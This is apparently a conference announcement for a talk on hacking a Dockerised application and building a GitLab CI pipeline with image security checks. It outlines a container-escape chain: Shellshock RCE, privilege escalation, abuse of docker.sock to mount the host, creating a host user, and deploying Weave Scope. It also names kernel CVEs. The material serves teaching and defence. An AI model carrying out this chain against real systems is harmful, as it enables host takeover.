Announcement: Breaking the application in Docker and building a secure pipeline in Gitlab

The annual conference will be held on November 20 Archdays, where Pasha Kann and I, as part of a demonstration, will show an example of how an application can be hacked in Docker and how to build a pipeline with security checks from scratch based on GitLab CI.

Hacking will take place in accordance with the instructions of the repository Pentest-In-Docker, which we prepared especially for Archdays. There is also a version in Russian, you can try to get root on a linux host right now.

Exploitation of a vulnerability consists of the following stages:

  • Gaining access to the container shell under the www-data user using RCE – CVE-2014-6271 (Shellshock);

  • Raising privileges to root through FakePip exploit;

  • Connecting to docker.sock and deploying a new ubuntu container with SSH service for further connection (with /: / host mount and maximum privileges);

  • Create user hidle on the host;

  • Connect to host with new user;

  • Expanding the Weave Scope.

This is one of the scenarios of how an attacker could act if he managed to detect RCE inside the application along with the connected docker.sock. Another scenario for going outside the container when docker.sock is missing is to exploit a kernel-level vulnerability, for example CVE-2016-5195 or CVE-2020-14386… Finally, the easiest way is to use the publicly available, unsecured Docker API. Here, the security of the infrastructure will depend on the configured authentication and authorization, the version of Docker and the presence of those 0-day vulnerabilities that you do not know about yet.

By the way, the deployment of the Weave Scope here is not accidental. Exactly entered grouping TeamTNT to gain control over the infrastructure.

The image can also be used to pilot commercial and open-source Container Security solutions to see how they detect malicious activity.

In the second part, we will demonstrate how to create a pipeline with image security checks using the example of GitLab CI. This pipeline includes Hadolint, Dockle, and Trivy checks to help prevent unsafe images from being pushed into production. This, in turn, reduces the chances of a successful compromise of infrastructure, like the example we showed in the first part. Embedding and pipeline instructions can be found on our other repo

Link to the program: https://archdays.ru/speakers/#track-bezopasnost-v-raspredelennyh-sistemah

If you suddenly want to come to the conference, but for some reason have not yet bought a ticket, then here is a promotional code for a 50% discount: SwordfishSecurityArchdays20

Useful materials

A Methodology for Penetration Testing Docker Systems – a good tutorial for testing applications in Docker

Awesome DevSecOps in Russian – a large selection of materials on DevSecOps in Russian

Awesome Docker Security – Docker security collection

Cloud Security Tools – a selection of tools for Cloud Security

CloudSecDocs – Wiki on Kubernetes, Docker and Cloud Security, including approaches to penetration testing

Similar Posts

Leave a Reply

Your email address will not be published. Required fields are marked *